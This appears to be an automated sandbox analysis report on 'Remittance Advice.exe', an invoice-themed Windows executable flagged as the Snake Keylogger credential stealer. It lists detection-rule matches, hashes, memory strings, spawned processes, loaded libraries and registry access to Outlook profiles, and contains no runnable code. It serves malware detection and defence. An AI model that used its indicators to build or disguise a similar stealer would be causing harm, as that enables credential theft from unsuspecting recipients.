Source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\Remittance Advice.exe	Code function: 0_2_030EE084	0_2_030EE084
Source: C:\Users\user\Desktop\Remittance Advice.exe	Code function: 0_2_07541648	0_2_07541648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_009EC168	3_2_009EC168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_009ECA58	3_2_009ECA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_009E2DD1	3_2_009E2DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_009E7E68	3_2_009E7E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_009E4F08	3_2_009E4F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_009EC387	3_2_009EC387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_009EB9DC	3_2_009EB9DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_009EB9E0	3_2_009EB9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_009E4EF8	3_2_009E4EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_009E7E67	3_2_009E7E67

Source: Remittance Advice.exe, 00000000.00000002.1452248422.00000000016EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Remittance Advice.exe
Source: Remittance Advice.exe, 00000000.00000002.1452750531.0000000003231000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePoses.dll, vs Remittance Advice.exe
Source: Remittance Advice.exe, 00000000.00000002.1452750531.00000000032AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePoses.dll, vs Remittance Advice.exe
Source: Remittance Advice.exe, 00000000.00000002.1452750531.00000000032AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs Remittance Advice.exe
Source: Remittance Advice.exe, 00000000.00000000.1446422403.0000000000F92000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNone.exe* vs Remittance Advice.exe
Source: Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVebinace.dll2 vs Remittance Advice.exe
Source: Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs Remittance Advice.exe
Source: Remittance Advice.exe	Binary or memory string: OriginalFilenameNone.exe* vs Remittance Advice.exe

Source: Remittance Advice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3

Source: C:\Users\user\Desktop\Remittance Advice.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Remittance Advice.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Mutant created: NULL

Source: Remittance Advice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Remittance Advice.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Remittance Advice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002691000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.00000000026C3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3926270561.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.00000000026AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.00000000026D0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Remittance Advice.exe	Virustotal: Detection: 73%
Source: Remittance Advice.exe	ReversingLabs: Detection: 73%

Source: unknown	Process created: C:\Users\user\Desktop\Remittance Advice.exe "C:\Users\user\Desktop\Remittance Advice.exe"
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Remittance Advice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Remittance Advice.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Remittance Advice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Remittance Advice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Source: Remittance Advice.exe

Static PE information: 0x827F415A [Thu May 19 00:31:22 2039 UTC]

Source: Remittance Advice.exe

Static PE information: section name: .text entropy: 7.769247848670264

Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
